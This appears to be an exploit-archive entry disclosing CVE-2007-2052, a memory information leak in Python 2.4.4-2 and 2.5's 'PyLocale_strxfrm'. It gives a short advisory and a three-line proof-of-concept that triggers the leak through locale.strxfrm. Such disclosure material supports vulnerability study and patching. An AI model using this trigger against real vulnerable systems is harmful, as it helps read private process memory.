Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak
| EKU-ID: 35143 | CVE: CVE-2007-2052;OSVDB-35247 | OSVDB-ID: |
| Author: Piotr Engelking | Published: 2007-05-08 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 35143 | CVE: CVE-2007-2052;OSVDB-35247 | OSVDB-ID: |
| Author: Piotr Engelking | Published: 2007-05-08 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/23887/info
Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak.
Exploiting this issue allows remote attackers to read portions of memory.
Python 2.4.4-2 and 2.5 are confirmed vulnerable.
#!/usr/bin/python
import locale
print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8')
print repr(locale.strxfrm('a'))